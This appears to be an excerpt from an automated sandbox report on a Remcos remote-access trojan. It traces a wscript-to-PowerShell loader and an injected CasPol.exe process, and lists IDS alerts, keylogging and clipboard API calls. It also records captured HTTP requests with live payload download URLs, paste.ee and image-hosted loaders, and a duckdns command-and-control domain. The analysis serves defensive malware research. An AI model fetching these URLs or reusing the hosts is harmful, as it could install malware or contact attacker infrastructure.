Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	12_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0044D5F9 FindFirstFileExA,	12_2_0044D5F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	12_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,	12_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	12_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	12_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00406F06

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49708 -> 192.210.150.24:80
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49788 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49778 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49794 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49801 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49810 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49818 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49843 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49827 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49851 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49860 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49885 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49876 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49909 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49917 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49869 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49892 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49934 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49943 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49951 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49983 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50029 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50022 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50047 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50039 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50034 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50044 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50049 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50035 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50036 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50048 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49900 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50042 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50019 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49966 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50053 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50006 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49925 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50055 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50021 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50040 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50058 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50026 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50063 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50027 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50023 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50041 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50043 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49974 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50050 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50038 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50045 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50051 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50037 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50046 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50020 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49836 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50052 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49990 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50062 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50024 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50060 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49958 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50057 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50054 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50061 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50059 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50025 -> 107.173.143.10:14646
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49715
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49771
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49771
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49771

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: newglobalfucntioninside.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: newglobalfucntioninside.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.6:49778 -> 107.173.143.10:14646

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/o8fzA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49771 -> 104.21.84.67:443

Source: global traffic

HTTP traffic detected: GET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.150.24Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_03007A18 URLDownloadToFileW,

3_2_03007A18

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /r/o8fzA/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.150.24Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: newglobalfucntioninside.duckdns.org

Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamyk
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF
Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#p
Source: powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:
Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFR
Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFf
Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFs
Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsx
Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwp
Source: powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFz
Source: powershell.exe, 00000008.00000002.2517116385.0000000006DD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: CasPol.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.G
Source: powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000008.00000002.2521068943.0000000007F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co#v
Source: powershell.exe, 00000003.00000002.2252958107.0000000008418000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.covVc
Source: powershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49771 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

12_2_004099E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_004159C6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

12_2_00409B10

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
